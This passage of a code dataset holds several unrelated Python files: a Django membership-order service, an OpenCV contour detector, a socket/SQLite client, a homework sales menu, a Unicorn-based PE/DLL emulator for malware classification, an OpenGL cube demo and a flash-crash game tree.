order_service_handler.generate_out_trade_no()\n\n # 商户订单中的商品描述\n def create_body(self, associator):\n name = associator.name\n price = associator.present_price\n body = \"\"\"声德:{associator_name}(¥{associator_price})\"\"\".format(\n associator_name=name,\n associator_price=price\n )\n return body\n\n # 获得回调url\n def get_wechat_pay_notify_url(self):\n return 'https://' + settings.OPEN_UPDAY_DOMAIN + '/media-platform/associator/pay-callback'\n # return 'http://milk345.imwork.net:45992/api/associator/pay-callback'\n\n # 生成ip\n def get_client_ip(self, request):\n try:\n x_forwarded_for = request.META.get('HTTP_X_FORWARDED_FOR')\n if x_forwarded_for:\n ip = x_forwarded_for.split(',')[0]\n else:\n ip = request.META.get('REMOTE_ADDR')\n except Exception:\n ip = '0.0.0.0'\n return ip\n\n # 下载订单Excel\n def generate_order_excel(self, order_list):\n matrix = []\n for order_info in order_list:\n translated_info = collections.OrderedDict()\n order_id = order_info['order_id']\n associator_id = order_info['associator_id']\n user_id = order_info['user_id']\n nickname = order_info['nickname']\n associator_name = order_info['associator_name']\n total_fee = order_info['total_fee']\n refund_status = order_info['refund_status']\n refund_time = order_info['refund_time']\n time_end = order_info['time_end']\n if refund_time:\n refund_time = DatetimeService.get_represent_from_timestamp(refund_time)\n else:\n refund_time = ''\n if time_end:\n time_end = DatetimeService.get_represent_from_timestamp(time_end)\n else:\n time_end = ''\n channel = order_info['channel']\n refund_operator = order_info['refund_operator']\n refund_reason = order_info['refund_reason']\n translated_info['订单号'] = order_id\n translated_info['会员ID'] = associator_id\n translated_info['用户ID'] = user_id\n translated_info['用户昵称'] = nickname\n translated_info['会员身份'] = associator_name\n translated_info['订单金额'] = total_fee\n translated_info['退款状态'] = refund_status\n translated_info['退款时间'] = refund_time\n translated_info['支付时间'] = time_end\n translated_info['报名渠道'] = channel\n translated_info['退款人'] = refund_operator\n translated_info['退款原因'] = refund_reason\n matrix.append(translated_info)\n file_handler = FileService()\n return file_handler.create_downloadable_excel(matrix)\n\n # 按照特定的昵称,会员身份,订单金额等条件去查询\n def search_order(self, order_set, nickname, associator_name, total_fee, refund_status, refund_time_scope,\n pay_time_scope, channel, refund_operator):\n if nickname:\n order_set = self.search_order_by_nickname(order_set, nickname)\n if associator_name:\n order_set = self.search_order_by_associator_name(order_set, associator_name)\n if total_fee:\n order_set = self.search_order_by_total_fee(order_set, total_fee)\n if pay_time_scope:\n order_set = self.search_order_by_pay_time(order_set, pay_time_scope)\n if channel:\n order_set = self.search_order_by_channel(order_set, channel)\n if refund_operator:\n order_set = self.search_order_by_operator(order_set, refund_operator)\n if refund_status == 1:\n order_set = self.search_order_by_refund_status(order_set, refund_status)\n if refund_time_scope:\n order_set = self.search_order_by_refund_time(order_set, refund_time_scope)\n if refund_status == 0:\n order_set = self.search_order_by_refund_status(order_set, refund_status)\n\n return order_set\n\n def search_order_by_nickname(self, original_order_set, nickname):\n return original_order_set.filter(student__nickname=nickname)\n\n def search_order_by_associator_name(self, original_order_set, associator_name):\n return 
original_order_set.filter(associator__name=associator_name)\n\n def search_order_by_total_fee(self, original_order_set, total_fee):\n return original_order_set.filter(total_fee=total_fee)\n\n def search_order_by_refund_status(self, original_order_set, refund_status):\n return original_order_set.filter(refund_status=refund_status)\n\n def search_order_by_channel(self, original_order_set, channel):\n return original_order_set.filter(channel__mark=channel)\n\n def search_order_by_operator(self, original_order_set, refund_operator):\n return original_order_set.filter(refund_operator__username=refund_operator)\n\n def search_order_by_refund_time(self, original_order_set, refund_time_scope):\n return original_order_set.filter(refund_time__range=(refund_time_scope[0], refund_time_scope[1]))\n\n def search_order_by_pay_time(self, original_order_set, pay_time_scope):\n return original_order_set.filter(time_end__range=(pay_time_scope[0], pay_time_scope[1]))\n","sub_path":"upday/modules/associator/service/associator_service.py","file_name":"associator_service.py","file_ext":"py","file_size_in_byte":17640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
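The expiry checks in the service above reduce to comparing exit_time (join_time + 365 days) against now; a standalone sketch with naive datetimes (DatetimeService presumably handles timezones):

from datetime import datetime, timedelta

def is_expired(exit_time, now=None):
    # mirrors is_expired_ship: expired once exit_time is in the past
    return exit_time < (now or datetime.utcnow())

join = datetime(2018, 1, 1)
assert is_expired(join + timedelta(days=365), now=datetime(2019, 6, 1))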
+{"seq_id":"366133998","text":"__author__ = 'KolesnikG'\n\nimport numpy as np\nimport cv2\n\nname=str(input('Enter the file name: '))\nimg = cv2.imread(name)\nindex=name.find('.jpg')\nname=name[:index]+'(binRes)'+'.jpg'\n\n\ngray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n\ngray_blur = cv2.GaussianBlur(gray, (15, 15), 0)\nret, thresh = cv2.threshold(gray_blur,0,255,cv2.THRESH_BINARY_INV+cv2.THRESH_OTSU)\nkernel = np.ones((3, 3), np.uint8)\nclosing = cv2.morphologyEx(thresh, cv2.MORPH_GRADIENT, kernel, iterations=1)\ncont_img=closing.copy()\nimage, contours, hierarchy = cv2.findContours(cont_img,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_NONE)\nprint('All contours:',len(contours))\n\n\ndef getCount(cnt):\n count=[]\n for c in contours:\n area = cv2.contourArea(c)\n if area < 700 or area > 1000000:\n continue\n else:\n count+=[c]\n return count\nprint('After calibration:',len(getCount(contours)))\n\ndef getMask(cnt, i):\n mask = np.zeros_like(thresh)\n cv2.drawContours(mask, cnt,i, 255, -1)\n out = np.zeros_like(thresh)\n out[mask == 255] = thresh[mask == 255]\n return out\n\ndef getContourImage(cnt,i):\n box=np.int0(cv2.boxPoints(cv2.minAreaRect(cnt[i])))\n x=box[0][0];y=box[1][1]\n w=box[3][0];h=box[0][1]\n\n z=getMask(cnt,i)[y:h,x:w]\n\n if z.size==0:\n return False\n elif cv2.countNonZero(z)/z.size<0.2:\n return False\n else:\n print('Rectangle','x:',x,', y:',y,', w:',w,', h:',h)\n return True\n\nc=getCount(contours)\nfor i in range(0,len(c)):\n if getContourImage(c,i)==True:\n ell = cv2.fitEllipse(c[i])\n cv2.ellipse(img, ell, (0,255,0), 2)\n box=np.int0(cv2.boxPoints(cv2.minAreaRect(c[i])))\n cv2.drawContours(img,[box],0,(0,0,255),1)\n\ncv2.imwrite(name,img)\nprint('Image was saved in program folder(dest) with name:',name)","sub_path":"detection/dark_areas2.0.py","file_name":"dark_areas2.0.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"300457631","text":"import socket\nimport sqlite3\nimport time\nimport json\nimport sys\n\nHOST = '127.0.0.1'\nPORT = 5000\nBUFFER_SIZE = 8192\n\ndef get_data(s, BUFFER_SIZE):\n data = b''\n while True:\n part = s.recv(BUFFER_SIZE)\n data += part\n if len(part) < BUFFER_SIZE: # either 0 or end of data\n break\n\n return data\n\ndef format_data(data):\n if len(data) <= 99999 and len(data) > 9999:\n return str(len(data)+5) + \"HOLIS\" + data\n elif len(data) <= 9999 and len(data) > 999:\n return \"0\" + str(len(data)+5) + \"HOLIS\" + data\n elif len(data) <= 999 and len(data) > 99:\n return \"00\" + str(len(data)+5) + \"HOLIS\" + data\n elif len(data) <= 99 and len(data) > 9:\n return \"000\" + str(len(data)+5) + \"HOLIS\" + data\n elif len(data) <= 9 and len(data) > 0:\n return \"0000\" + str(len(data)+5) + \"HOLIS\" + data\n elif len(data) == 0:\n return \"00005HOLIS\"\n else:\n return \"00010HOLISERROR\"\n\n#def formatted_message(service: str, msg: str):\n# length = len(service + msg)\n# if len(service) != 5:\n# raise Exception('El largo del nombre del servicio debe ser igual a 5')\n# if len(msg) == 0:\n# raise Exception('Falta el mensaje')\n# if length > 99999:\n# raise Exception('Mensaje excede el largo de 99999 caracteres')\n# left_padding = '0'*(5 - len(f'{length}'))\n# return str.encode(left_padding + str(length) + service + msg)\n\ndef get_product_json(data):\n\tkeys = ['id', 'name', 'country', 'date']\n\tjson_object = []\n\n\tfor elem in data:\n\t\tdic = {}\n\t\tfor item in enumerate(keys):\n\t\t\tdic[item[1]] = elem[item[0]]\n\t\tjson_object.append(dic)\n\n\treturn json.dumps(json_object)\n\nwith socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.connect((HOST, PORT))\n s.sendall(b'00010sinitHOLIS')\n data = get_data(s, BUFFER_SIZE)\n print('Received1 ', data.decode('utf-8'))\n\n while True:\n data2 = get_data(s, BUFFER_SIZE)\n print('Received2 ', data2.decode('utf-8'))\n # time.sleep(5)\n\n conn = sqlite3.connect('Project.db')\n c = conn.cursor()\n\n if len(data2) == 10:\n c.execute(\"SELECT * FROM CLIENTS\")\n\n aux1 = get_product_json(c.fetchall())\n aux2 = format_data(aux1)\n conn.commit()\n conn.close()\n \n #aux2 = bytes(aux2, 'utf-8')\n #print(aux2, type(aux2)) \n #print(sys.getsizeof(bytes(aux2, 'utf-8')))\n \n \n if aux2:\n #s.sendall(b'00010HOLISTAMOS')\n s.sendall(bytes(aux2, 'utf-8'))\n \n \n s.close()\n\n\n\n#c.execute('''CREATE TABLE CLIENTS\n# ([generated_id] INTEGER PRIMARY KEY,[Client_Name] text, [Country_ID] integer, [Date] date)''')","sub_path":"services/db/Test_Select.py","file_name":"Test_Select.py","file_ext":"py","file_size_in_byte":2648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"394238394","text":"from rest_framework import status\nfrom rest_framework.exceptions import APIException, _get_error_details\n\n\nclass GenericAPIException(APIException):\n status_code = status.HTTP_500_INTERNAL_SERVER_ERROR\n default_detail = 'A server error occurred.'\n default_code = 'error'\n\n def __init__(self, status_code=None, detail=None, code=None):\n if status_code is None:\n status_code = self.status_code\n if detail is None:\n detail = self.default_detail\n if code is None:\n code = self.default_code\n\n self.detail = _get_error_details(detail, code)\n self.status_code = status_code\n","sub_path":"api/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"633250484","text":"'''\nPython Programming hw7\n21500426\nSi Hyung You\n2018/04/25\n'''\nimport copy #for using deepcopy later, import copy function\nimport hw7module as m\ncheck=0\n#initialize 'sales' list with ten people, and their sales\nsales=[['김기수',79,34,45,50],['최영호',100,122,89,90],['김영후',34,45,23,67],\n ['홍미수',56,78,42,67],['박수민',118,135,90,99],['이성준',23,33,63,12],\n ['최미영',121,234,213,154],['김홍일',56,45,23,67],['박성민',67,77,45,89],['이수빈',56,50,65,23]]\n\n#first, add all salesman's sales for total sales and append it to each row\nfor i in range(len(sales)):\n totalsale = 0\n for j in range(4):\n totalsale += sales[i][j+1]\n sales[i].append(totalsale)\n print(sales[i])\n\n\nwhile True:\n print('*'*10, 'MENU', '*'*10) #repeat next menus unless user types F or f\n print(\"A. print salesman's sales\")\n print(\"B. specific person's sales\")\n print(\"C. sorting by sales\")\n print(\"D. add new salesman\")\n print(\"E. delete salesman\")\n print(\"F. terminate program\")\n print('*'*10, 'MENU', '*'*10)\n #store user's choice in variable so that program can determine which menu to execute\n choice = input(\"choose the menu: \")\n if choice == 'A' or choice == 'a':\n m.menu_A(sales)\n \n elif choice == 'B' or choice == 'b':\n m.menu_B(sales)\n\n elif choice == 'C' or choice == 'c':\n index = int(input(\"which index for sorting?: (0. name, 1. 1st quarter, 2. 2nd quarter, 3. 3rd quarter, 4. 4th quarter, 5. total sales) \"))\n m.menu_A(m.menu_C(sales, index)) #print sorted function(which differs from the original one) which being returned from menu_C \n\n elif choice == 'D' or choice == 'd':\n m.menu_D(sales)\n \n elif choice == 'E' or choice == 'e':\n index = int(input(\"which index for delete? \"))\n m.menu_E(sales, index)\n \n elif choice == 'F' or choice == 'f':\n break\n\n else:\n print(\"choose menu again..\") #if user types menu which is not suggested, tell them to choose again\n\nprint(\"Bye\")\n\n\n","sub_path":"hw7/21500426_hw7_SihyungYou.py","file_name":"21500426_hw7_SihyungYou.py","file_ext":"py","file_size_in_byte":2218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"251057392","text":"#!/usr/bin/python\n# This file only is used to test code\n\n\nfrom capstone import *\n\n# using pefile module to handle PE file and dlls\nimport pefile\n\n# For handling arguments\nimport argparse\n\n# for interate a directory\nimport os\n\n# packing value\nimport struct\n\n# loading constants\nimport constants\n\n# For emulation, we use unicorn engine\nfrom unicorn import *\nfrom unicorn.x86_const import *\n\n\n# for PE class\nimport pe\n\n# Data structure\nimport datastructure\n\n# Now we can handle a dll. What we want to do here is to get dll's content\n# and also the dll's metadata \ndef dll_loader( dllPath, Dll, dllBase, dllNameBase, ldrBase):\n\n\t# Specify dll path\n\tdllName = dllPath.split('/')[1]\n\n\tDll.setName(dllName)\n\n\t# root dir of dlls\n\tDll.setDir(dllPath)\n\n\t# set dll name\n\tDll.setName(dllName)\n\n\t# parse dll\n\ttry:\n\t\tdll = pefile.PE(dllPath)\n\texcept pefile.PEFormatError:\n\t\tpass\n\n\t# Parse data directories\n\tdll.parse_data_directories()\n\n\t# Get dll's contents\n\tdata = str(bytearray(dll.get_memory_mapped_image()))\n\n\t# set content of dll\n\tDll.setData(data)\n\n\t# set DLL base\n\tDll.setDllBase(dllBase)\n\n\t# Set DLL name base\n\tDll.setDllNameBase(dllNameBase)\n\n\t# Set LDR base\t\n\tDll.setLdrBase(ldrBase)\n\n\t# Set dllBase for dll\n\tDll.setSizeOfImage(dll.OPTIONAL_HEADER.SizeOfImage)\n\n\t# Set entrypoint\n\tDll.setEntryPoint(dll.OPTIONAL_HEADER.AddressOfEntryPoint)\n\n\t# set import dll\n\tfor entry in dll.DIRECTORY_ENTRY_EXPORT.symbols:\n\t\tprint(\"entry address 0x%08x \" % (entry.address))\n\t\tprint(\"Dll Base 0x%08x \" % (Dll.getDllBase()))\n\t\tDll.setImpDll(entry.address, entry.name)\n\n\t# display import dll\n\tDll.getImpDll()\n\n\n\t# returns size of dll and base address\n\treturn Dll\n\n\t# Populate ldr instance\n\t#ldr.init_ldr()\n\n\n# Loading dlls into memory\ndef loadDlls(mu, dll):\n\n\t# Write dll content into memory at the address dllBase\n\t# We need the dll content and the address we are going to write\n\t# get DLL's content\n\tprint(\">>> Writing Dll data into memory\")\n\tdllData = dll.getData()\n\t# get DLL's base address\n\tdllBase = dll.getDllBase()\n\tmu.mem_write(dllBase, dllData)\n\n\t# Write dll name into memory ad the address dllNameBase\n\t# We need the dll name and the adress we are going to write\n\t# get DLL's name\n\tprint(\">>> Writing Dll name into memory\")\n\tdllName = dll.getName()\n\n\t# get name base address\n\tdllNameBase = dll.getDllNameBase()\n\tmu.mem_write(dllNameBase, dllName)\n\n\t# Write LDR module to memory\n\t#mu.mem_write(ldrBase, )\n\n\n# Parse input pe\ndef parse_pe(newFile, peobj):\n\n\t# Open PE file\n\tpef = pefile.PE(newFile, fast_load = True)\n\n\t# If the PE file was loaded usign the fast_load=True argument, \n\t# we will need to parse the data directories\n\tpef.parse_data_directories()\n\n\t# Finding entrypoint\n\tpeobj.setEntryPoint(pef.OPTIONAL_HEADER.AddressOfEntryPoint)\n\tprint(\"Entry point: 0x%08x \" % (peobj.getEntryPoint()))\n\n\t# Iterate imports and popluate pe\n\tfor entry in pef.DIRECTORY_ENTRY_IMPORT:\n\n\t\tfor imp in entry.imports:\n\n\t\t\t# import name\n\t\t\tpeobj.setImportName(imp.name)\n\n\t\t\t# import address\n\t\t\tpeobj.setImportAddr(imp.address)\n\n\t\t\t# import's library\n\t\t\tpeobj.setImportLib(entry.dll)\n\t\t\t#print(\"%s : 0x%08x: %s\" % (peobj.getImportName(), peobj.getImportAddr(), peobj.getImportLib()))\t\n\n\t# Iterate sections\n\tfor section in pef.sections:\n\n\t\t# section 
name\n\t\tpeobj.setSectionName(section.Name)\n\n\t\t# virtual address\n\t\tpeobj.setSectionVirAddr(section.VirtualAddress)\n\n\t\t# virtual size\n\t\tpeobj.setSectionVirSize(section.Misc_VirtualSize)\n\n\t\t# raw size\n\t\tpeobj.setSectionSizeOfRawData(section.SizeOfRawData)\n\n\t\t# Test\n\t\tprint(\"%s : 0x%08x: 0x%08x: 0x%08x\" %(peobj.getSectionName(), peobj.getSectionVirAddr(),\n\t\t\tpeobj.getSectionVirSize(), peobj.getSectionSizeOfRawData()))\n\n\t\t# Look for an entry point in a section\n\t\tif section.contains_rva(peobj.getEntryPoint()):\n\t\t\tprint(\"Section %s contains an entry point\" % (peobj.getSectionName()))\n\n\t\t\t# populate a text section with match section\n\t\t\tpeobj.setCodeSection(section)\n\n\t\t\t# set size of text section\n\t\t\tpeobj.setCodeSectionSize(peobj.getSectionSizeOfRawData())\n\n\t\t\tprint(\"Code section size : 0x%08x\" % (peobj.getCodeSectionSize()))\n\n\n\t# Rewrite Import Address Table\n\tpeobj.setData(bytearray(pef.get_memory_mapped_image()))\n\n\n\n\n\n\n# main function\ndef main():\n\n\t# parse arguments\n\t# Create an ArgumentParser object\n\tparser = argparse.ArgumentParser(prog = \"Malware Classification\", description = 'Searching an export in a DLL')\n\n\t# Add the first argument: a path to the dll\n\tparser.add_argument('-d', dest='dll_path', help='Specify a dll path')\n\n\t# Add the second argument: an disired export\n\tparser.add_argument('-e', dest='export', help='Specify a disired export')\n\n\t\t# Add the second argument: an disired export\n\tparser.add_argument('-f', dest='file', help='Specify a disired pe file')\n\n\t# Let's parse arguments, the arguments are accessed through args variable\n\targs = parser.parse_args()\n\n\t# Test\n\tpeobj = pe.PE()\n\n\tparse_pe(args.file, peobj)\n\n\t# Create a LDR instance\n\tx86os = datastructure.X86_OS()\n\n\tDlls = []\n\t# Time for unicorn\n\ttry:\n\n\t\t# Initialize an emulator in X86-32bit mode\n\t\tmu = Uc(UC_ARCH_X86, UC_MODE_32)\n\n\t\t# Map 10MB memory for the emulation\n\t\tmu.mem_map(constants.FS_0, 100 * 1024 * 1024)\n\n\t\t# Initializing Stack frame\n\t\tfss = x86os.init_FS()\n\t\tmu.mem_write(constants.FS_0, fss)\n\t\t\n\t\t# FS register\n\t\tmu.reg_write(UC_X86_REG_FS, constants.FS_0)\t\n\t\t\t\n\t\t# initializing PEB\n\t\tprint(\"Initializing PEB\")\n\t\tmu.mem_write(constants.PEB_ADD, x86os.init_peb())\n\n\t\t# initializing TEB\n\t\tprint(\"Initializing TEB\")\n\t\tmu.mem_write(constants.TEB_ADD, x86os.init_teb())\n\n\t\t# initializing stack of emulator\n\t\tmu.reg_write(UC_X86_REG_EBP, constants.STACK_BASE)\n\t\tmu.reg_write(UC_X86_REG_ESP, constants.STACK_BASE)\n\n\t\t# Testing\n\t\tprint(\"PEB\", mu.mem_read(constants.PEB_ADD , len(x86os.init_peb())))\n\t\tprint(\"TEB\", mu.mem_read(constants.TEB_ADD , len(x86os.init_teb())))\n\t\tprint(\"FS\", mu.mem_read(constants.FS_0 , len(x86os.init_FS())))\n\t\tprint(\"FS register: 0x%08x \" % (mu.reg_read(UC_X86_REG_FS)))\n\t\tprint(\"ESP register: 0x%08x \" % (mu.reg_read(UC_X86_REG_ESP)))\n\t\tprint(\"EBP register: 0x%08x \" % (mu.reg_read(UC_X86_REG_EBP)))\n\t\t# Loading dlls\n\t\tprint(\"\\n>>> Loading DLLs...\")\n\n\t\t# Iterate DLL directory\n\t\tfor subdir, dirs, files in os.walk(args.dll_path):\n\n\t\t\t# We need a based address for dlls\n\t\t\tdllBase = 0x550000\n\n\t\t\t# Base address of DLL name\n\t\t\tdllNameBase = 0x2500\n\n\t\t\t# Base address of LDR module\n\t\t\tldrBase = 0x9000\n\n\t\t\t# Number of Dlls in a directory\n\t\t\tNoOfDlls = 0\n\n\t\t\t# List of ldr address, to keep track order of the list\n\t\t\tldrList = 
[]\n\n\t\t\t# List of in memory Dlls\n\t\t\t#dllList = DllList()\n\n\t\t\tdllList = datastructure.DoubleList()\n\n\t\t\t# Iterate dlls in the directory\n\t\t\tfor file in files:\n\n\t\t\t\t# Increase number of Dlls by 1\n\t\t\t\tNoOfDlls = NoOfDlls + 1\n\n\t\t\t\t# get fullpath of dll\n\t\t\t\tfullpath = os.path.join(subdir, file)\n\n\t\t\t\t# Create an instance of DLL\n\t\t\t\tdllobj = pe.Dll()\n\n\t\t\t\t# size of the current dll\n\t\t\t\tdllobj = dll_loader(fullpath, dllobj, dllBase, dllNameBase, ldrBase)\n\n\t\t\t\t# Writing dll components into memory\n\t\t\t\t# Loading the dll into memory\n\t\t\t\tloadDlls(mu, dllobj)\n\n\t\t\t\tprint(\"Reading %d bytes from [0x%08x]: %s\" % (dllobj.sizeOfDllName(),\n\t\t\t dllobj.getDllNameBase(), mu.mem_read(dllobj.getDllNameBase(),dllobj.sizeOfDllName())))\n\t\t\t\tprint(\"\\n\")\n\n\t\t\t\t# size of Dll\n\t\t\t\tdllSize = dllobj.sizeOfData()\n\n\t\t\t\t# Store Dll instances into the list\n\t\t\t\tDlls.append(dllobj)\n\n\t\t\t\t# inmemory lsit\n\t\t\t\t#dllList.add(dll)\n\n\t\t\t\tdllList.append(dllobj)\n\n\t\t\t\t# Update ldrList\n\t\t\t\tldrList.append(ldrBase)\n\n\t\t\t\t# Align memory to load the next dlls\n\t\t\t\tdllBase = dllBase + dllSize\n\n\t\t\t\t# Adjust base address of DLL\n\t\t\t\tdllNameBase = dllNameBase + 200\n\t\t\t\t\n\t\t\t\t# Each LDR module takes a memory of 8192 Byte\n\t\t\t\t# This means we increase the base 0x2000 for each interation\n\t\t\t\tldrBase = ldrBase + 8192 # 0x2000\n\n\t\t# Print in-memory list\n\t\tdllList.show()\n\n\n\texcept UcError as e:\n\t\tprint(\"ERROR: %s\" % e)\n\t\tmu.emu_stop()\n\nif __name__ == \"__main__\":\n\tmain()\n\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":7889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"83275022","text":"import pygame\nfrom pygame.locals import *\nfrom random import *\nfrom OpenGL.GL import *\nfrom OpenGL.GLU import *\n\nANGLE_ROT = 20\nNB_CUBES = 2\nNUM_GENERE = 0\nNO_CUBE = 0\nALEAT = [[(random(),random(),random()) for _ in range(NB_CUBES*3*4*6)] for _ in range(NB_CUBES)]\n\nverticies = (\n (1, -1, -1),\n (1, 1, -1),\n (-1, 1, -1),\n (-1, -1, -1),\n (1, -1, 1),\n (1, 1, 1),\n (-1, -1, 1),\n (-1, 1, 1)\n )\n\nedges = ((0,1),(0,3),(0,4),(2,1),(2,3),(2,7),(6,3),(6,4),(6,7),(5,1),(5,4),(5,7))\nsurfaces = ((0,1,2,3),(3,2,7,6),(6,7,5,4),(4,5,1,0),(1,5,7,2),(4,0,3,6))\n\ndef Cube(verticies=verticies):\n global NO_CUBE\n glBegin(GL_QUADS)\n for surface in surfaces:\n #x = 0\n NUM_GENERE = 0\n for vertex in surface:\n #x+=1\n #glColor3fv(colors[randint(0,len(colors)-1)]) # Cube épileptique !\n #glColor3fv((random(),random(),random()))\n #print(ALEAT)\n print(NO_CUBE,NUM_GENERE)\n glColor3fv(ALEAT[NO_CUBE][NUM_GENERE])\n NUM_GENERE+=1\n glVertex3fv(verticies[vertex])\n glEnd()\n NO_CUBE+=1\n print(NO_CUBE,\"END FUNCTION CUBE\")\n\n glBegin(GL_LINES)\n for edge in edges:\n for vertex in edge:\n glVertex3fv(verticies[vertex])\n glEnd()\n\ndef main():\n pygame.init()\n display = (800,600)\n pygame.display.set_mode(display, DOUBLEBUF|OPENGL)\n\n gluPerspective(45, (display[0]/display[1]), 0.1, 50.0)\n\n glTranslatef(0,0, -10)\n\n glRotatef(25, 2, 1, 0)\n\n while True:\n \n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_KP4:\n glTranslatef(-0.5,0,0)\n if event.key == pygame.K_KP6:\n glTranslatef(0.5,0,0)\n if event.key == pygame.K_KP8:\n glTranslatef(0,1,0)\n if event.key == pygame.K_KP2:\n glTranslatef(0,-1,0)\n \n if event.key == pygame.K_PAGEDOWN:\n glRotatef(ANGLE_ROT, 1, 0, 0)\n if event.key == pygame.K_PAGEUP:\n glRotatef(ANGLE_ROT, -1, 0, 0)\n if event.key == pygame.K_UP:\n glRotatef(ANGLE_ROT, 0, 1, 0)\n if event.key == pygame.K_DOWN:\n glRotatef(ANGLE_ROT, 0, -1, 0)\n \n if event.key == pygame.K_RIGHT:\n glRotatef(ANGLE_ROT, 0, 0, 1)\n if event.key == pygame.K_LEFT:\n glRotatef(ANGLE_ROT, 0, 0, -1)\n\n #glRotatef(1, 3, 1, 1)\n glClear(GL_COLOR_BUFFER_BIT|GL_DEPTH_BUFFER_BIT)\n Cube()\n #Cube([list(map(lambda x:x/2,e)) for e in verticies])\n pygame.display.flip()\n #pygame.time.wait(0)\n\nmain()\n","sub_path":"test pls cubes.py","file_name":"test pls cubes.py","file_ext":"py","file_size_in_byte":2924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"279140620","text":"import copy\n\nfrom AssetFundNetwork import AssetFundsNetwork\nimport random\n\nfrom common import copy_network\nfrom constants import ATTACKER, CHANCE, DEFENDER, MARKET, BUY, SELL, SIM_TRADE\nfrom games.bases import GameStateBase\n\n\nclass PlayersHiddenInfo:\n def __init__(self,attacker_attack, attacker_pid, defender_budget):\n self.attacker_attack = attacker_attack\n self.attacker_pid = attacker_pid\n self.defender = defender_budget\n\n def __eq__(self, other):\n return isinstance(other, PlayersHiddenInfo) and self.defender == other.defender and\\\n self.attacker_attack == other.attacker_attack and self.attacker_pid == other.attacker_pid\n\n\nclass PortfolioFlashCrashGameStateBase(GameStateBase):\n\n def __init__(self, parent, to_move, actions, af_network, players_info, actions_history):\n super().__init__(parent=parent, to_move = to_move,actions=actions)\n self.actions_history=actions_history\n self.af_network = af_network\n self.players_info = players_info\n self.children = {}\n\n def inf_set(self):\n return self._information_set\n\n def evaluation(self):\n if not self.is_terminal():\n raise RuntimeError(\"trying to evaluate non-terminal node\")\n\n return -1*self.af_network.count_margin_calls()\n\n\nclass PortfolioFlashCrashRootChanceGameState(GameStateBase):\n def __init__(self, action_mgr, af_network:AssetFundsNetwork, defender_budget):\n self._chance_prob = action_mgr.get_portfolios_prob()\n portfolios = {x: y.order_set for x, y in action_mgr.get_portfolios().items() if x in self._chance_prob}\n super().__init__(parent=None, to_move=CHANCE, actions = portfolios.keys())\n self.af_network = af_network\n self.children = {\n str(p_id): PortfolioAttackerMoveGameState(\n parent=self, actions_manager=action_mgr, to_move=ATTACKER,\n players_info=PlayersHiddenInfo(p, p_id, defender_budget),\n af_network=af_network,\n actions_history={BUY:[],SELL:[],SIM_TRADE:[]}\n ) for p_id, p in portfolios.items()\n }\n\n self.tree_size = 1 + sum([x.tree_size for x in self.children.values()])\n\n def is_terminal(self):\n return False\n\n def inf_set(self):\n return \".\"\n\n def chance_prob(self):\n return self._chance_prob\n\n def sample_one(self):\n return random.choice(list(self.children.values()))\n\n\nclass PortfolioMarketMoveGameState(PortfolioFlashCrashGameStateBase):\n\n def __init__(self, parent, actions_manager, to_move, players_info, af_network, actions_history):\n self.terminal = af_network.no_more_sell_orders()\n if self.terminal:\n actions = []\n else:\n net2 = copy_network(af_network)\n actions = [str(net2.simulate_trade())]\n\n super().__init__(parent = parent, to_move = to_move, actions=actions,\n af_network = af_network, players_info=players_info, actions_history=actions_history)\n\n self._information_set = \".{0}.{1}.{2}\".format('MARKET_HISTORY:' + str(actions_history[SIM_TRADE])\n ,'BUY:'+str(af_network.buy_orders), 'SELL:'+str(af_network.sell_orders))\n\n if actions:\n action = actions[0]\n actions_history2 = copy.deepcopy(actions_history)\n actions_history2[SELL].append(action)\n actions_history2[BUY].append(action)\n actions_history2[SIM_TRADE].append(action)\n self.children[action] = PortfolioAttackerMoveGameState(\n self,\n actions_manager,\n ATTACKER,\n players_info,\n net2,\n actions_history2\n )\n self.tree_size = 1 + sum([x.tree_size for x in self.children.values()])\n\n def chance_prob(self):\n return 1\n\n def is_terminal(self):\n return self.terminal\n\n\nclass PortfolioAttackerMoveGameState(PortfolioFlashCrashGameStateBase):\n def 
__init__(self, parent, actions_manager, to_move, players_info, af_network, actions_history):\n actions = actions_manager.get_possible_attacks_from_portfolio(players_info.attacker_attack, af_network.no_more_sell_orders())\n self.terminal = not actions\n\n super().__init__(parent=parent, to_move=to_move, actions = [str(x['action_subset']) for x in actions ],\n af_network=af_network, players_info=players_info, actions_history=actions_history)\n\n for action in actions:\n order_set = action['action_subset']\n net2 = copy_network(af_network)\n net2.submit_sell_orders(order_set)\n actions_history2 = copy.deepcopy(actions_history)\n actions_history2[SELL].append(str(order_set))\n self.children[str(order_set)] = PortfolioDefenderMoveGameState(\n self,\n actions_manager,\n DEFENDER,\n PlayersHiddenInfo(action['remaining_orders'], players_info.attacker_pid, players_info.defender),\n net2,\n actions_history2,\n )\n\n self.tree_size = 1 + sum([x.tree_size for x in self.children.values()])\n self._information_set = \".{0}.{1}\".format(players_info.attacker_pid, 'A_HISTORY:' + str(actions_history[SELL]))\n\n def is_terminal(self):\n return self.terminal\n\n\nclass PortfolioDefenderMoveGameState(PortfolioFlashCrashGameStateBase):\n\n def __init__(self, parent, actions_manager, to_move, players_info, af_network, actions_history):\n defenses = actions_manager.get_possible_defenses(af_network, players_info.defender)\n str_order_sets = [str(x[0]) for x in defenses]\n super().__init__(parent=parent, to_move=to_move, actions=str_order_sets,\n af_network=af_network, players_info=players_info, actions_history=actions_history)\n\n# if not defenses:\n# self.budget.defender = 0 #in case there is only a small amount of money\n # else:\n for order_set, cost in defenses:\n net2 = 